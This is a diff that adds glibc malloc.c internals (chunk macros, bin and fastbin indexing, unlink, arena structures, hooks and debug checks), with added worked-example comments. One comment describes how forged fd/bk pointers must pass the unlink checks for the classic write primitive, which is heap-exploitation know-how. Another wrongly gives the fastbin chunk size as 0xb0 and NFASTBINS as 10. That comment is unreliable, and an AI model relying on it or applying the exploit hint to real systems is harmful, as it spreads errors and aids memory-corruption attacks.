+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
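+
+/* Worked example (illustrative only, not from the upstream sources),
+   assuming a 64-bit build with SIZE_SZ == 8, MALLOC_ALIGNMENT == 16,
+   MALLOC_ALIGN_MASK == 15 and MINSIZE == 32:
+
+     request2size (0)     == 32      too small, bumped up to MINSIZE
+     request2size (24)    == 32      (24 + 8 + 15) & ~15
+     request2size (25)    == 48      no longer fits in a 0x20 chunk
+     request2size (0x100) == 0x110
+
+   Only one SIZE_SZ of overhead is added because an in-use chunk may borrow
+   the prev_size field of its successor as user data.  */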
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
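+
+/* Worked example (illustrative only, not from the upstream sources): a
+   64-bit size field holding 0x111 describes a 0x110-byte chunk whose lower
+   neighbour is in use:
+
+     chunksize_nomask (p) == 0x111
+     chunksize (p)        == 0x110      PREV_INUSE (0x1) masked off
+     prev_inuse (p)       != 0
+     chunk_is_mmapped (p) == 0
+     chunk_main_arena (p) != 0
+*/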
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV);  \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
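+
+/* Spelled out (illustrative only, not from the upstream sources), the two
+   integrity checks above amount to requiring
+
+     chunksize (P) == prev_size (next_chunk (P))     size vs. prev_size
+     P->fd->bk == P && P->bk->fd == P                list consistency
+
+   before P is taken off its bin.  Forged fd/bk pointers therefore have to
+   point at memory whose bk/fd fields point back at P for the classic
+   unlink write primitive to get past these checks.  */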
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
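+
+/* Worked example (illustrative only, not from the upstream sources), for a
+   64-bit build where SMALLBIN_WIDTH == 16 and MIN_LARGE_SIZE == 0x400:
+
+     bin_index (0x20)  == smallbin_index (0x20)  == 2     first small bin
+     bin_index (0x3f0) == smallbin_index (0x3f0) == 63    last small bin
+     bin_index (0x400) == largebin_index (0x400) == 64    first large bin
+*/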
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from the system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
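+/* Illustrative sketch, not part of the glibc sources: with NBINS == 128
+   and 32 bits per map word, binmap has 4 words and bin i is tracked by
+   bit (i % 32) of word (i / 32).  */
+static void __attribute__ ((unused))
+binmap_index_examples (void)
+{
+  assert (BINMAPSIZE == 4);
+  assert (idx2block (33) == 1 && idx2bit (33) == (1U << 1));
+  assert (idx2block (64) == 2 && idx2bit (64) == (1U << 0));
+}
+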
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
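+/* Illustrative sketch, not part of the glibc sources.  Assuming a
+   64-bit build (SIZE_SZ == 8): chunk sizes 0x20, 0x30, ... map to
+   consecutive fastbins starting at index 0, MAX_FAST_SIZE is 0xa0,
+   and NFASTBINS works out to 10.  */
+static void __attribute__ ((unused))
+fastbin_index_examples (void)
+{
+  assert (fastbin_index (0x20) == 0);   /* smallest chunk                */
+  assert (fastbin_index (0x80) == 6);   /* default max_fast-sized chunk  */
+  /* request2size (MAX_FAST_SIZE) is a 0xb0-byte chunk, the last index.  */
+  assert (fastbin_index (request2size (MAX_FAST_SIZE)) == NFASTBINS - 1);
+}
+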
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   The lowest bits of the arena's flags field (formerly kept in
+   max_fast) are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in the arena flags indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
+
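+/* Worked example, not from the glibc sources: on a 64-bit build
+   DEFAULT_MXFAST is 0x80, so malloc_init_state's
+   set_max_fast (DEFAULT_MXFAST) stores (0x80 + 8) & ~0xf == 0x80 in
+   global_max_fast, making chunks of 0x20..0x80 bytes fastbin-eligible.
+   set_max_fast (0) stores SMALLBIN_WIDTH (0x10), which is below MINSIZE
+   and therefore matches no chunk at all.  */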
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes); there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
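+/* Worked example, not from the glibc sources: with sizeof (long) == 8,
+   NARENAS_FROM_NCORES (1) == 8, so arena_test defaults to 8.  Unless
+   M_ARENA_MAX is set, the allocator ends up allowing roughly eight
+   arenas per core on 64-bit builds (two per core on 32-bit) before
+   threads start sharing arenas.  */
+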
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called only from within malloc_consolidate, which needs to
+   be called in the same contexts anyway.  It is never called directly
+   outside of malloc_consolidate because some optimizing compilers try
+   to inline it at all call points, which turns out not to be an
+   optimization at all. (Inlining it in malloc_consolidate is fine though.)
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  av->flags |= FASTCHUNKS_BIT;
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
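+/* Illustrative user-side sketch, not part of malloc.c; it would be
+   built as a separate program, and only works on glibc releases that
+   still ship these hooks (they are long deprecated and were removed in
+   glibc 2.34).  It shows how the weak hook variables above can be
+   overridden by an application:
+
+   #include <malloc.h>
+   #include <stdio.h>
+
+   static void *(*old_malloc_hook) (size_t, const void *);
+
+   static void *
+   logging_malloc_hook (size_t size, const void *caller)
+   {
+     void *result;
+     __malloc_hook = old_malloc_hook;     // avoid recursing into ourselves
+     result = malloc (size);
+     fprintf (stderr, "malloc (%zu) from %p -> %p\n",
+              size, (void *) caller, result);
+     old_malloc_hook = __malloc_hook;     // malloc may have reset the hook
+     __malloc_hook = logging_malloc_hook;
+     return result;
+   }
+
+   int
+   main (void)
+   {
+     old_malloc_hook = __malloc_hook;
+     __malloc_hook = logging_malloc_hook;
+     free (malloc (32));
+     return 0;
+   }
+*/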
+
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+# define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
